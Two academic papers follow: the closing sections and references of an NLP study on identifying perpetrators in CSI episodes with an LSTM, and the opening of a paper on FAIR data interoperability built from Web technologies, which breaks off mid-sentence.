tracks model behavior over the course of two episodes, across 100 equally sized intervals. We show the cumula- tive development of f1 (top plot), cumulative true positive counts (center plot), and true positive counts within each interval (bottom plot). Red bars indicate times at which annotators pressed the red button. Figure 7 (right) shows that humans may outper- form the LSTM in precision (but not necessarily in recall). Humans are more cautious at guessing the perpetrator: the first human guess appears around sentence 300 (see the leftmost red vertical bars in Figure 7 right), the first model guess around sen- tence 190, and the first true mention around sentence 30. Once humans guess the perpetrator, however, they are very precise and consistent. Interestingly, model guesses at the start of the episode closely fol- low the pattern of gold-perpetrator mentions (bottom plots in Figure 7). This indicates that early model guesses are not noise, but meaningful predictions. Further analysis of human responses is illustrated in Figure 8. For each of our three annotators we plot the points in each episode where they press the red button to indicate that they know the perpetra- tor (bottom). We also show the number of times (all three) annotators pressed the red button individually for each interval and cumulatively over the course of the episode. Our analysis reveals that viewers tend to press the red button more towards the end, which is not unexpected since episodes are inherently de- signed to obfuscate the identification of the perpe- trator. Moreover, Figure 8 suggests that there are two types of viewers: eager viewers who like our model guess early on, change their mind often, and therefore press the red button frequently (annotator 1 pressed the red button 6.1 times on average per 10 0 0.2 0.4 0.6 0.8 1 portion of episode lapsed annotator 1 annotator 2 annotator 3 all annotators frequency all annotators cumulative Figure 8: Number of times the red button is pressed by each anno- tator individually (bottom) and by all three within each time interval and cumulatively (top). Times are normalized with respect to length. Statistics are averaged across 18/12/9 cases per annotator 1/2/3. First correct perpetrator prediction min max avg LSTM 2 554 141 Human 12 1014 423 Table 3: Sentence ID in the script where the LSTM and Humans predict the true perpetrator for the first time. We show the earliest (min) latest (max) and av- erage (avg) prediction time over 30 test episodes (five cross-validation splits). Episode 03 (Season 03): “Let the Seller Beware” s1 s2 s3 s4 s5 s6 s7 s8 s9 Grissom pulls out a small evidence bag with the filling He puts it on the table Tooth fill- ing 0857 10-7-02 Brass We also found your finger- prints and your hair Peter B. Look I’m sure you’ll find me all over the house Peter B. I wanted to buy it Peter B. I was ev- erywhere Brass well you made sure you were every- where too didn’t you? Episode 21 (Season 05): “Committed” s1 s2 s3 s4 s5 s6 s7 s8 Grissom What’s so amusing? Adam Trent So let’s say you find out who did it and maybe it’s me. Adam Trent What are you going to do? Adam Trent Are you going to convict me of murder and put me in a bad place? Adam smirks and starts biting his nails. Grissom Is it you? Adam Trent Check the files sir. Adam Trent I’m a rapist not a mur- derer. Table 4: Excerpts of CSI episodes together with model predictions. Model confidence (p(l = 1)) is illustrated in red, with darker shades corresponding to higher confidence. True perpetrator mentions are highlighted in blue. Top: a conversation involving the true perpetrator. Bottom: a conversation with a suspect who is not the perpetrator. episode) and conservative viewers who guess only late and press the red button less frequently (on av- erage annotator 2 pressed the red button 2.9 times per episode, and annotator 3 and 3.7 times). Notice that statistics in Figure 8 are averages across several episodes each annotator watched and thus viewer behavior is unlikely to be an artifact of individual episodes (e.g., featuring more or less suspects). Ta- ble 3 provides further evidence that the LSTM be- haves more like an eager viewer. It presents the time in the episode (by sentence count) where the model correctly identifies the perpetrator for the first time. As can be seen, the minimum and average identifi- cation times are lower for the LSTM compared to human viewers. Table 4 shows model predictions on two CSI screenplay excerpts. We illustrate the degree of the model’s belief in a perpetrator being mentioned by color intensity. True perpetrator mentions are high- lighted in blue. In the first example, the model mostly identifies perpetrator mentions correctly. In the second example, it identifies seemingly plausible sentences which, however, refer to a suspect and not the true perpetrator. 5.6 What if There Is No Perpetrator? In our experiments, we trained our model on CSI episodes which typically involve a crime, commit- ted by a perpetrator, who is ultimately identified. How does the LSTM generalize to episodes without 11 0 10 20 30 40 50 60 0 50 100 150 200 250 300 350 400 450 c o u n t #sentences observed LSTM fp Human fp Figure 8: Cumulative counts of false positives (fp) for the LSTM and a human viewer for an episode with no perpetrator (the victim committed suicide). Red vertical bars show the times at which the viewer pressed the red button indicating that they (think they) have identified the perpetrator. a crime, e.g., because the “victim” turns out to have committed suicide? To investigate how model and humans alike respond to atypical input we present both with an episode featuring a suicide, i.e., an episode which did not have any true positive perpe- trator mentions. Figure 8 tracks the incremental behavior of a hu- man viewer and the model while watching the sui- cide episode. Both are primed by their experience with CSI episodes to identify characters in the plot as potential perpetrators, and consequently predict false positive perpetrator mentions. The human re- alizes after roughly two thirds of the episode that there is no perpetrator involved (he does not anno- tate any subsequent sentences as “perpetrator men- tioned”), whereas the LSTM continues to make per- petrator predictions until the end of the episode. The LSTM’s behavior is presumably an artifact of the re- curring pattern of discussing the perpetrator in the very end of an episode. 6 Conclusions In this paper we argued that crime drama is an ideal testbed for models of natural language understand- ing and their ability to draw inferences from com- plex, multi-modal data. The inference task is well- defined and relatively constrained: every episode poses and answers the same “whodunnit” ques- tion. We have formalized perpetrator identifica- tion as a sequence labeling problem and developed an LSTM-based model which learns incrementally from complex naturalistic data. We showed that multi-modal input is essential for our task, as well an incremental inference strategy with flexible ac- cess to previously observed information. Compared to our model, humans guess cautiously in the begin- ning, but are consistent in their predictions once they have a strong suspicion. The LSTM starts guessing earlier, leading to superior initial true-positive rates, however, at the cost of consistency. There are many directions for future work. Be- yond perpetrators, we may consider how suspects emerge and disappear in the course of an episode. Note that we have obtained suspect annotations but did not use them in our experiments. It should also be interesting to examine how the model behaves out-of-domain, i.e., when tested on other crime se- ries, e.g., “Law and Order”. Finally, more detailed analysis of what happens in an episode (e.g., what actions are performed, by who, when, and where) will give rise to deeper understanding enabling ap- plications like video summarization and skimming. Acknowledgments The authors gratefully ac- knowledge the support of the European Research Council (award number 681760; Frermann, Lap- ata) and H2020 EU project SUMMA (award number 688139/H2020-ICT-2015; Cohen). We also thank our annotators, the TACL editors and anonymous re- viewers whose feedback helped improve the present paper, and members of EdinburghNLP for helpful discussions and suggestions. References Stanislaw Antol, Aishwarya Agrawal, Jiasen Lu, M̃argaret Mitchell, Dhruv Batra, C. Lawrence Zitnick, and Devi Parikh. 2015. VQA: Visual Question An- swering. In Proceedings of the IEEE International Conference on Computer Vision (ICCV), pages 2425– 2433, Santiago, Chile. Piotr Bojanowski, Francis Bach, Ivan Laptev, Jean Ponce, Cordelia Schmid, and Josef Sivic. 2013. Finding ac- tors and actions in movies. In The IEEE International Conference on Computer Vision (ICCV), pages 2280– 2287, Sydney, Australia. John S. Boreczky and Lynn D. Wilcox. 1998. A hid- den Markov model framework for video segmentation using audio and image features. In Proceedings of the 1998 IEEE International Conference on Acoustics, Speech and Signal Processing (ICASSP), pages 3741– 3744, Seattle, Washington, USA. 12 Samuel R. Bowman, Gabor Angeli, Christopher Potts, and Christopher D. Manning. 2015. A large anno- tated corpus for learning natural language inference. In Proceedings of the 2015 Conference on Empirical Methods in Natural Language Processing, pages 632– 642, Lisbon, Portugal. Elia Bruni, Nam Khanh Tran, and Marco Baroni. 2014. Multimodal distributional semantics. Journal of Arti- ficial Intelligence Research, 49(1):1–47, January. Sachin Chachada and C.-C. Jay Kuo. 2014. Environmen- tal sound recognition: A survey. APSIPA Transactions on Signal and Information Processing, 3. Jacob Cohen. 1960. A coefficient of agreement for nom- inal scales. Educational and Psychological Measure- ment, 20(1):37–46. Timothee Cour, Chris Jordan, Eleni Miltsakaki, and Ben Taskar. 2008. Movie/script: Alignment and parsing of video and text transcription. In Proceedings of the 10th European Conference on Computer Vision, pages 158–171, Marseille, France. Steven B. Davis and Paul Mermelstein. 1990. Com- parison of parametric representations for monosyllabic word recognition in continuously spoken sentences. In Alex Waibel and Kai-Fu Lee, editors, Readings in Speech Recognition, pages 65–74. Morgan Kaufmann Publishers Inc., San Francisco, California, USA. Nevenka Dimitrova, Lalitha Agnihotri, and Gang Wei. 2000. Video classification based on HMM using text and faces. In Proceedings of the 10th European Signal Processing Conference (EUSIPCO), pages 1–4. IEEE. Desmond Elliott and Frank Keller. 2013. Image descrip- tion using visual dependency representations. In Pro- ceedings of the 2013 Conference on Empirical Meth- ods in Natural Language Processing, pages 1292– 1302, Seattle, Washington, USA. Philip John Gorinski and Mirella Lapata. 2015. Movie script summarization as graph-based scene extraction. In Proceedings of the 2015 Conference of the North American Chapter of the Association for Computa- tional Linguistics: Human Language Technologies, pages 1066–1076, Denver, Colorado, USA. Karl Moritz Hermann, Tomas Kocisky, Edward Grefen- stette, Lasse Espeholt, Will Kay, Mustafa Suleyman, and Phil Blunsom. 2015. Teaching machines to read and comprehend. In C. Cortes, N. D. Lawrence, D. D. Lee, M. Sugiyama, and R. Garnett, editors, Advances in Neural Information Processing Systems 28, pages 1693–1701. Curran Associates, Inc. Felix Hill, Antoine Bordes, Sumit Chopra, and Jason We- ston. 2015. The Goldilocks principle: Reading chil- dren’s books with explicit memory representations. In Proceedings of the 3rd International Conference on Learning Representations (ICLR), San Diego, Califor- nia, USA. Sepp Hochreiter and Jürgen Schmidhuber. 1997. Long short-term memory. Neural Computation, 9(8):1735– 1780, November. Justin Johnson, Ranjay Krishna, Michael Stark, Li-Jia Li, David A Shamma, Michael S Bernstein, and Li Fei- Fei. 2015. Image retrieval using scene graphs. In Proceedings of the 2015 IEEE Conference on Com- puter Vision and Pattern Recognition (CVPR), pages 3668–3678, Boston, Massachusetts, USA. Andrej Karpathy and Li Fei-Fei. 2015. Deep visual- semantic alignments for generating image descrip- tions. In Proceedings of the IEEE Conference on Com- puter Vision and Pattern Recognition, pages 3128– 3137, Boston, Massachusetts. Douwe Kiela and Léon Bottou. 2014. Learning image embeddings using convolutional neural networks for improved multi-modal semantics. In Proceedings of the 2014 Conference on Empirical Methods in Natural Language Processing (EMNLP), pages 36–45, Doha, Qatar. John D. Lafferty, Andrew McCallum, and Fernando C. N. Pereira. 2001. Conditional random fields: Probabilis- tic models for segmenting and labeling sequence data. In Proceedings of the 18th International Conference on Machine Learning, pages 282–289, San Francisco, CA, USA. Morgan Kaufmann Publishers Inc. Angeliki Lazaridou, Nghia The Pham, and Marco Ba- roni. 2015. Combining language and vision with a multimodal skip-gram model. In Proceedings of the 2015 Conference of the North American Chapter of the Association for Computational Linguistics: Hu- man Language Technologies, pages 153–163, Denver, Colorado, USA. Dahua Lin, Sanja Fidler, Chen Kong, and Raquel Urta- sun. 2014. Visual semantic search: Retrieving videos via complex textual queries. In IEEE Conference on Computer Vision and Pattern Recognition, pages 2657–2664, Columbus, Ohio, USA. Cory S. Myers and Lawrence R. Rabiner. 1981. A com- parative study of several dynamic time-warping algo- rithms for connected word recognition. The Bell Sys- tem Technical Journal, 60(7):1389–1409. Milind R. Naphide and Thomas S. Huang. 2001. A prob- abilistic framework for semantic video indexing, filter- ing, and retrieval. IEEE Transactions on Multimedia, 3(1):141–151. Luis Gilberto Mateos Ortiz, Clemens Wolff, and Mirella Lapata. 2015. Learning to interpret and describe ab- stract scenes. In Proceedings of the 2015 NAACL: Hu- man Language Technologies, pages 1505–1515, Den- ver, Colorado, USA. Jeffrey Pennington, Richard Socher, and Christopher D. Manning. 2014. GloVe: Global vectors for word rep- resentation. In Proceedings of the 2014 Conference 13 on Empirical Methods in Natural Language Process- ing (EMNLP), pages 1532–1543, Doha, Qatar. Pranav Rajpurkar, Jian Zhang, Konstantin Lopyrev, and Percy Liang. 2016. SQuAD: 100,000+ questions for machine comprehension of text. In Proceedings of the 2016 Conference on Empirical Methods in Natu- ral Language Processing, pages 2383–2392, Austin, Texas, USA. Zeeshan Rasheed, Yaser Sheikh, and Mubarak Shah. 2005. On the use of computable features for film clas- sification. IEEE Transactions on Circuits and Systems for Video Technology, 15(1):52–64. Matthew Richardson, Christopher J.C. Burges, and Erin Renshaw. 2013. MCTest: A challenge dataset for the open-domain machine comprehension of text. In Pro- ceedings of the 2013 Conference on Empirical Meth- ods in Natural Language Processing, pages 193–203, Seattle, Washington, USA. Tim Rocktäschel, Edward Grefenstette, Karl Moritz Her- mann, Tomas Kocisky, and Phil Blunsom. 2016. Rea- soning about entailment with neural attention. In Proceedings of the 4th International Conference on Learning Representations (ICLR), San Juan, Puerto Rico. Anna Rohrbach, Atousa Torabi, Marcus Rohrbach, Niket Tandon, Christopher Pal, Hugo Larochelle, Aaron Courville, and Bernt Schiele. 2017. Movie de- scription. International Journal of Computer Vision, 123(1):94–120. Md Sahidullah and Goutam Saha. 2012. Design, analy- sis and experimental evaluation of block based trans- formation in MFCC computation for speaker recogni- tion. Speech Communication, 54(4):543–565. Jitao Sang and Changsheng Xu. 2010. Character-based movie summarization. In Proceedings of the 18th ACM International Conference on Multimedia, pages 855–858, Firenze, Italy. Carina Silberer, Vittorio Ferrari, and Mirella Lapata. 2016. Visually grounded meaning representations. IEEE Transactions on Pattern Analysis and Machine Intelligence, 99. Josef Sivic, Mark Everingham, and Andrew Zisserman. 2009. “Who are you?” – Learning person specific classifiers from video. In IEEE Conference on Com- puter Vision and Pattern Recognition, pages 1145– 1152, Miami, Florida, USA. Ilya Sutskever, Oriol Vinyals, and Quoc V. Le. 2014. Sequence to sequence learning with neural networks. In Proceedings of the 27th International Conference on Neural Information Processing Systems, NIPS’14, pages 3104–3112, Cambridge, MA, USA. MIT Press. Christian Szegedy, Sergey Ioffe, and Vincent Vanhoucke. 2016. Inception-v4, Inception-ResNet and the im- pact of residual connections on learning. CoRR, abs/1602.07261. Makarand Tapaswi, Martin Bäuml, and Rainer Stiefelha- gen. 2015. Aligning plot synopses to videos for story- based retrieval. International Journal of Multimedia Information Retrieval, (4):3–26. Makarand Tapaswi, Yukun Zhu, Rainer Stiefelhagen, Antonio Torralba, Raquel Urtasun, and Sanja Fidler. 2016. MovieQA: Understanding stories in movies through question-answering. In The IEEE Conference on Computer Vision and Pattern Recognition (CVPR), pages 4631–4640, Las Vegas, Nevada. Subhashini Venugopalan, Marcus Rohrbach, Jeff Don- ahue, Raymond J. Mooney, Trevor Darrell, and Kate Saenko. 2015a. Sequence to sequence – Video to text. In Proceedings of the 2015 International Conference on Computer Vision (ICCV), pages 4534–4542, Santi- ago, Chile. Subhashini Venugopalan, Huijuan Xu, Jeff Donahue, Marcus Rohrbach, Raymond Mooney, and Kate Saenko. 2015b. Translating videos to natural lan- guage using deep recurrent neural networks. In Pro- ceedings the 2015 Conference of the North American Chapter of the Association for Computational Linguis- tics – Human Language Technologies (NAACL HLT 2015), pages 1494–1504, Denver, Colorado, June. Oriol Vinyals, Alexander Toshev, Samy Bengio, and Du- mitru Erhan. 2015. Show and tell: A neural image caption generator. Proceedings of the 2015 IEEE Con- ference on Computer Vision and Pattern Recognition (CVPR), pages 3156–3164. Ellen M. Voorhees and Dawn M. Tice. 2000. Building a question answering test collection. In ACM Special In- terest Group on Information Retrieval (SIGIR), pages 200–207, Athens, Greece. Jason Weston, Antoine Bordes, Sumit Chopra, and Tomas Mikolov. 2015. Towards AI-complete ques- tion answering: A set of prerequisite toy tasks. CoRR, abs/1502.05698. Kelvin Xu, Jimmy Ba, Ryan Kiros, Kyunghyun Cho, Aaron Courville, Ruslan Salakhudinov, Rich Zemel, and Yoshua Bengio. 2015. Show, attend and tell: Neu- ral image caption generation with visual attention. In Proceedings of the 32nd International Conference on Machine Learning, pages 2048–2057, Boston, Mas- sachusetts, USA. Yi Yang, Wen-tau Yih, and Christopher Meek. 2015. WikiQA: A challenge dataset for open-domain ques- tion answering. In Proceedings of the 2015 Confer- ence on Empirical Methods in Natural Language Pro- cessing, pages 2013–2018, Lisbon, Portugal. Mark Yatskar, Luke Zettlemoyer, and Ali Farhadi. 2016. Situation recognition: Visual semantic role labeling 14 for image understanding. In Proceedings of the IEEE Conference on Computer Vision and Pattern Recogni- tion (CVPR), pages 5534–5542, Zurich, Switzerland. Wojciech Zaremba, Ilya Sutskever, and Oriol Vinyals. 2014. Recurrent neural network regularization. CoRR, abs/1409.2329. Yukun Zhu, Ryan Kiros, Rich Zemel, Ruslan Salakhut- dinov, Raquel Urtasun, Antonio Torralba, and Sanja Fidler. 2015. Aligning books and movies: Towards story-like visual explanations by watching movies and reading books. In The IEEE International Conference on Computer Vision (ICCV), Santiago, Chile. 15 16 work_6egrw63wyfcczp2iyrguf2koaq ---- Submitted 12 October 2016 Accepted 23 March 2017 Published 24 April 2017 Corresponding author Mark D. Wilkinson, markw@illuminae.com Academic editor Sebastian Ventura Additional Information and Declarations can be found on page 29 DOI 10.7717/peerj-cs.110 Copyright 2017 Wilkinson et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Interoperability and FAIRness through a novel combination of Web technologies Mark D. Wilkinson1, Ruben Verborgh2, Luiz Olavo Bonino da Silva Santos3, Tim Clark4,5, Morris A. Swertz6, Fleur D.L. Kelpin6, Alasdair J.G. Gray7, Erik A. Schultes8, Erik M. van Mulligen9, Paolo Ciccarese10, Arnold Kuzniar11, Anand Gavai11, Mark Thompson12, Rajaram Kaliyaperumal12, Jerven T. Bolleman13 and Michel Dumontier14 1 Center for Plant Biotechnology and Genomics UPM-INIA, Universidad Politécnica de Madrid, Madrid, Spain 2 IMEC, Ghent University, Ghent, Belgium 3 Dutch Techcentre for Life Sciences, Utrecht, The Netherlands 4 Department of Neurology, Massachusetts General Hospital, Boston, MA, United States of America 5 Department of Neurology, Harvard Medical School, Boston, United States of America 6 Genomics Coordination Center and Department of Genetics, University Medical Center Groningen, Groningen, The Netherlands 7 Department of Computer Science, School of Mathematical and Computer Sciences, Heriot-Watt University, Edinburgh, United Kingdom 8 FAIR Data, Dutch TechCenter for Life Science, Utrecht, The Netherlands 9 Department of Medical Informatics, Erasmus University Medical Center, Rotterdam, The Netherlands 10 Elmer Innovation Lab, Harvard Medical School, Boston, United States of America 11 Netherlands eScience Center, Amsterdam, The Netherlands 12 Department of Human Genetics, Leiden University Medical Center, Leiden, The Netherlands 13 Swiss-Prot Group, SIB Swiss Institute of Bioinformatics, Centre Medical Universitaire, Geneva, Switzerland 14 Stanford Center for Biomedical Informatics Research, Stanford University School of Medicine, Stanford, CA, United States of America ABSTRACT Data in the life sciences are extremely diverse and are stored in a broad spectrum of repositories ranging from those designed for particular data types (such as KEGG for pathway data or UniProt for protein data) to those that are general-purpose (such as FigShare, Zenodo, Dataverse or EUDAT). These data have widely different levels of sensitivity and security considerations. For example, clinical observations about genetic mutations in patients are highly sensitive, while observations of species diversity are generally not. The lack of uniformity in data models from one repository to another, and in the richness and availability of metadata descriptions, makes integration and analysis of these data a manual, time-consuming task with no scalability. Here we explore a set of resource-oriented Web design patterns for data discovery, accessibility, transformation, and integration that can be implemented by any general- or special- purpose repository as a means to assist users in finding and reusing their data holdings. We show that by using off-the-shelf technologies, interoperability can be achieved atthe level of an individual spreadsheet cell. We note that the behaviours of this architecture compare favourably to the desiderata defined by the FAIR Data Principles, and can therefore represent an exemplar implementation of those principles. The proposed interoperability design patterns may be used to improve discovery and integration of both new and legacy data, maximizing the utility of all scholarly outputs. How to cite this article Wilkinson et al. (2017), Interoperability and FAIRness through a novel combination of Web technologies. PeerJ Comput. Sci. 3:e110; DOI 10.7717/peerj-cs.110 https://peerj.com mailto:markw@illuminae.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.110 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://dx.doi.org/10.7717/peerj-cs.110 Subjects Bioinformatics, Data Science, Databases, Emerging Technologies, World Wide Web and Web Science Keywords FAIR data, Interoperability, Data integration, Semantic web, Linked data, REST INTRODUCTION Carefully-generated data are the foundation for scientific conclusions, new hypotheses, discourse, disagreement and resolution of these disagreements, all of which drive scientific discovery. Data must therefore be considered, and treated, as first-order scientific output, upon which there may be many downstream derivative works, among these, the familiar research article (Starr et al., 2015). But as the volume and complexity of data continue to grow, a data publication and distribution infrastructure is beginning to emerge that is not ad hoc, but rather explicitly designed to support discovery, accessibility, (re)coding to standards, integration, machine-guided interpretation, and re-use. In this text, we use the word ‘‘data’’ to mean all digital research artefacts, whether they be data (in the traditional sense), research-oriented digital objects such as workflows, or combinations/packages of these (i.e., the concept of a ‘‘research object’’, (Bechhofer et al., 2013)). Effectively, all digital entities in the research data ecosystem will be considered data by this manuscript. Further, we intend ‘‘data’’ to include both data and metadata, and recognize that the distinction between the two is often user-dependent. Data, of all types, are often published online, where the practice of open data publication is being encouraged by the scholarly community, and increasingly adopted as a requirement of funding agencies (Stein et al., 2015). Such publications utilize either a special-purpose repository (e.g., model-organism or molecular data repositories) or increasingly commonly will utilize general-purpose repositories such as FigShare, Zenodo, Dataverse, EUDAT or even institutional repositories. Special-purpose repositories generally receive dedicated funding to curate and organize data, and have specific query interfaces and APIs to enable exploration of their content. General-purpose repositories, on the other hand, allow publication of data in arbitrary formats, with little or no curation and often very little structured metadata. Both of these scenarios pose a problem with respect to interoperability. While APIs allow mechanized access to the data holdings of a special-purpose repository, each repository has its own API, thus requiring specialized software to be created for each cross-repository query. Moreover, the ontological basis of the curated annotations are not always transparent (neither to humans nor machines), which hampers automated integration. General purpose repositories are less likely to have rich APIs, thus often requiring manual discovery and download; however, more importantly, the frequent lack of harmonization of the file types/formats and coding systems in the repository, and lack of curation, results in much of their content being unusable (Roche et al., 2015). Previous projects, specifically in the bio/medical domain, that have attempted to achieve deep interoperability include caBIO (Covitz et al., 2003) and TAPIR (De Giovanni et al., 2010). The former created a rich SOAP-based API, enforcing a common interface over all repositories. The latter implemented a domain-specific query language that all participating repositories should respond to. These initiatives successfully enabled Wilkinson et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.110 2/34 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.110 powerful cross-resource data exploration and integration; however, this was done at the expense of broad-scale uptake, partly due to the complexity of implementation, and/or required the unavoidable participation of individual data providers, who are generally resource-strained. Moreover, in both cases, the interoperability was aimed at a specific field of study (cancer, and biodiversity respectively), rather than a more generalized interoperability goal spanning all domains. With respect to more general-purpose approaches, and where ‘lightweight’ interoperability was considered acceptable, myGrid (Stevens, Robinson & Goble, 2003) facilitated discovery and interoperability between Web Services through rich ontologically- based annotations of the service interfaces, and BioMoby (Wilkinson et al., 2008) built on these myGrid annotations by further defining a novel ontology-based service request/response structure to guarantee data-level compatibility and thereby assist in workflow construction (Withers et al., 2010). SADI (Wilkinson, Vandervalk & McCarthy, 2011), and SSWAP (Gessler et al., 2009) used the emergent Semantic Web technologies of RDF and OWL to enrich the machine-readability of Web Service interface definitions and the data being passed—SADI through defining service inputs and outputs as instances of OWL Classes, and SSWAP through passing data embedded in OWL ‘graphs’ to assist both client and server in interpreting the meaning of the messages. In addition, two Web Service interoperability initiatives emerged from the World Wide Web Consortium— OWL-S (Martin et al., 2005) and SAWSDL (Martin, Paolucci & Wagner, 2007), both of which used semantic annotations to enhance the ability of machines to understand Web Service interface definitions and operations. All of these Service-oriented projects enjoyed success within the community that adopted their approach; however, the size of these adopting communities have, to date, been quite limited and are in some cases highly domain-specific. Moreover, each of these solutions is focused on Web Service functionality, which represents only a small portion of the global data archive, where most data is published as static records. Service-oriented approaches additionally require data publishers to have considerable coding expertise and access to a server in order to utilize the standard, which further limits their utility with respect to the ‘lay’ data publishers that make-up the majority of the scholarly community. As such, these and numerous other interoperability initiatives, spanning multiple decades, have yet to convincingly achieve a lightweight, broadly domain-applicable solution that works over a wide variety of static and dynamic source data resources, and can be implemented with minimal technical expertise. There are many stakeholders who would benefit from progress in this endeavour. Scientists themselves, acting as both producers and consumers of these public and private data; public and private research-oriented agencies; journals and professional data publishers both ‘‘general purpose’’ and ‘‘special purpose’’; research funders who have paid for the underlying research to be conducted; data centres (e.g., the EBI (Cook et al., 2016), and the SIB (SIB Swiss Institute of Bioinformatics Members, 2016)) who curate and host these data on behalf of the research community; research infrastructures such as BBMRI-ERIC (Van Ommen et al., 2015) and ELIXIR (Crosswell & Thornton, 2012), and diverse others. All of these stakeholders have distinct needs with respect to the behaviours of the scholarly data infrastructure. Scientists, for example, need to access research datasets in Wilkinson et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.110 3/34 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.110 order to initiate integrative analyses, while funding agencies and review panels may be more interested in the metadata associated with a data deposition—for example, the number of views or downloads, and the selected license. Due to the diversity of stakeholders; the size, nature/format, and distribution of data assets; the need to support freedom-of-choice of all stakeholders; respect for privacy; acknowledgment of data ownership; and recognition of the limited resources available to both data producers and data hosts, we see this endeavour as one of the Grand Challenges of eScience. In January 2014, representatives of a range of stakeholders came together at the request of the Netherlands eScience Centre and the Dutch Techcentre for Life Sciences (DTL) at the Lorentz Centre in Leiden, the Netherlands, to brainstorm and debate about how to further enhance infrastructures to support a data ecosystem for eScience. From these discussions emerged the notion that the definition and widespread support of a minimal set of community-agreed guiding principles and practices could enable data providers and consumers—machines and humans alike—to more easily find, access, interoperate, and sensibly re-use the vast quantities of information being generated by contemporary data-intensive science. These principles and practices should enable a broad range of integrative and exploratory behaviours, and support a wide range of technology choices and implementations, just as the Internet Protocol (IP) provides a minimal layer that enables the creation of a vast array of data provision, consumption, and visualisation tools on the Internet. The main outcome of the workshop was the definition of the so-called FAIR guiding principles aimed at publishing data in a format that is Findable, Accessible, Interoperable and Reusable by both machines and human users. The FAIR Principles underwent a period of public discussion and elaboration, and were recently published (Wilkinson et al., 2016). Briefly, the principles state: Findable—data should be identified using globally unique, resolvable, and persistent identifiers, and should include machine-actionable contextual information that can be indexed to support human and machine discovery of that data. Accessible—identified data should be accessible, optimally by both humans and machines, using a clearly-defined protocol and, if necessary, with clearly-defined rules for authorization/authentication. Interoperable—data becomes interoperable when it is machine-actionable, using shared vocabularies and/or ontologies, inside of a syntactically and semantically machine-accessible format. Reusable—Reusable data will first be compliant with the F, A, and I principles, but further, will be sufficiently well-described with, for example, contextual information, so it can be accurately linked or integrated, like-with-like, with other data sources. Moreover, there should be sufficiently rich provenance information so reused data can be properly cited. While the principles describe the desired features that data publications should exhibit to encourage maximal, automated discovery and reuse, they provide little guidance regarding how to achieve these goals. This poses a problem when key organizations are already endorsing, or even requiring adherence to the FAIR principles. For example, a biological research group has conducted an experiment to examine polyadenylation site Wilkinson et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.110 4/34 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.110 usage in the pathogenic fungus Magnaporthe oryzae, recording, by high-throughput 3′-end sequencing, the preference of alternative polyadenylation site selection under a variety of growth conditions, and during infection of the host plant. The resulting data take the form of study-specific Excel spreadsheets, BED alignment graphs, and pie charts of protein functional annotations. Unlike genome or protein sequences and microarray outputs, there is no public curated repository for these types of data, yet the data are useful to other researchers, and should be (at a minimum) easily discovered and interpreted by reviewers or third-party research groups attempting to replicate their results. Moreover, their funding agency, and their preferred scientific journal, both require that they publish their source data in an open public archive according to the FAIR principles. At this time, the commonly used general-purpose data archival resources in this domain do not explicitly provide support for FAIR, nor do they provide tooling or even guidance for how to use their archival facilities in a FAIR-compliant manner. As such, the biological research team, with little or no experience in formal data publishing, must nevertheless self-direct their data archival in a FAIR manner. We believe that this scenario will be extremely common throughout all domains of research, and thus this use-case was the initial focus for this interoperability infrastructure and FAIR data publication prototype. Here we describe a novel interoperability architecture that combines three pre-existing Web technologies to enhance the discovery, integration, and reuse of data in repositories that lack or have incompatible APIs; data in formats that normally would not be considered interoperable such as Excel spreadsheets and flat-files; or even data that would normally be considered interoperable, but do not use the desired vocabulary standards. We examine the extent to which the features of this architecture comply with the FAIR Principles, and suggest that this might be considered a ‘‘reference implementation’’ for the FAIR Principles, in particular as applied to non-interoperable data in any general- or special- purpose repository. We provide two exemplars of usage. The first is focused on a use-case similar to that presented above, where we use our proposed infrastructure to create a FAIR, self-archived scholarly deposit of biological data to the general-purpose Zenodo repository. The second, more complex example has two objectives—first to use the infrastructure to improve transparency and FAIRness of metadata describing the inclusion criterion for a dataset, representing a subset of a special-purpose, curated resource (UniProt); and second, to show how even the already FAIR data within UniProt may be transformed to increase its FAIRness even more by making it interoperable with alternative ontologies and vocabularies, and more explicitly connecting it to citation information. Finally, we place this work in the context of other initiatives and demonstrate that it is complementary to, rather than in competition with, other initiatives. METHODS Implementation Overview of technical decisions and their justification The World Wide Web Consortium’s (W3C) Resource Description Framework (RDF) offers the ability to describe entities, their attributes, and their relationships with explicit Wilkinson et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.110 5/34 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.110 semantics in a standardized manner compatible with widely used Web application formats such as JSON and XML. The Linked Data Principles (Berners-Lee, 2006) mandate that data items and schema elements are identified by HTTP-resolvable URIs, so the HTTP protocol can be used to obtain the data. Within an RDF description, using shared public ontology terms for metadata annotations supports search and large scale integration. Given all of these features, we opted to use RDF as the basis of this interoperability infrastructure, as it was designed to share data on the Web. Beyond this, there was a general feeling that any implementation that required a novel data discovery/sharing ‘‘Platform’’, ‘‘Bus’’, or API, was beyond the minimal design that we had committed to; it would require the invention of a technology that all participants in the data ecosystem would then be required to implement, and this was considered a non-starter. However, there needed to be some form of coalescence around the mechanism for finding and retrieving data. Our initial target-community—that is, the biomedical sciences—have embraced lightweight HTTP interfaces. We propose to continue this direction with an implementation based on REST (Fielding & Taylor, 2002), as several of the FAIR principles map convincingly onto the objectives of the REST architectural style for distributed hypermedia systems, such as having resolvable identifiers for all entities, and a common machine-accessible approach to discovering and retrieving different representations of those entities. The implementation we describe here is largely based on the HTTP GET method, and utilizes rich metadata and hypermedia controls. We use widely-accepted vocabularies not only to describe the data in an interoperable way, but also to describe its nature (e.g., the context of the experiment and how the data was processed) and how to access it. These choices help maximize uptake by our initial target-community, maximize interoperability between resources, and simplify construction of the wide (not pre-defined) range of client behaviours we intend to support. Confidential and privacy-sensitive data was also an important consideration, and it was recognized early on that it must be possible, within our implementation, to identify and richly describe data and/or datasets without necessarily allowing direct access to them, or by allowing access through existing regulatory frameworks or security infrastructures. For example, many resources within the International Rare Disease Research Consortium participate in the RD Connect platform (Thompson et al., 2014) which has defined the ‘‘disease card’’—a metadata object that gives overall information about the 